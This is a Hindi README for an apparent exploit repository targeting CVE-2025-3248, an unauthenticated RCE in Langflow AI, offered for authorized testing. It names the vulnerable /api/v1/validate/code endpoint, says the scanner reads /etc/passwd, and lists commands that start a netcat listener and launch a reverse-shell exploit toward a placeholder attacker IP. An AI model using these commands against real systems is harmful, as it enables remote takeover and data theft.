
CVE-2025-3248 के लिए स्कैनर और एक्सप्लॉइट, Langflow AI में एक अप्रमाणित RCE। इसमें अधिकृत सुरक्षा परीक्षण के लिए एक भेद्यता जांचकर्ता और एक रिवर्स शेल पेलोड जनरेटर शामिल है।
इस रिपॉजिटरी में दो Python स्क्रिप्ट्स हैं:
LangflowCheck.py: एक स्कैनर जो CVE-2025-3248 के लिए कमजोर Langflow AI इंस्टेंस की जाँच करता है।exploit.py: कमजोर Langflow लक्ष्यों के लिए एक काम करने वाला रिवर्स शेल एक्सप्लॉइट।CVE-2025-3248 Langflow AI में एक गंभीर कमजोरी है जो बिना प्रमाणीकरण के हमलावरों को /api/v1/validate/code पर एक तैयार पेलोड भेजकर दूरस्थ रूप से मनमाना Python कोड निष्पादित करने की अनुमति देती है।
LangflowCheck.py/etc/passwd पढ़ता है।exploit.pylhost) और लिसनर पोर्ट (lport) की आवश्यकता होती है।exploit.log में लॉग करता है।pip install -r requirements.txt
एकल URL
python3 LangflowCheck.py --url http://target.com --output vulnerable_target.txt

एकाधिक लक्ष्य
python3 LangflowCheck.py --file targets.txt --output vulnerable_targets.txt

पहले, एक लिसनर शुरू करें
sudo nc -nvlp 4444

फिर, एक्सप्लॉइट चलाएँ:
python3 exploit.py --target http://target.com --lhost YOUR_IP --lport 4444

यदि लक्ष्य कमजोर है तो आपको एक शेल प्राप्त होना चाहिए।

यह एक्सप्लॉइट केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण के लिए है। उन प्रणालियों के खिलाफ उपयोग न करें जिनके आप मालिक नहीं हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट अनुमति नहीं है।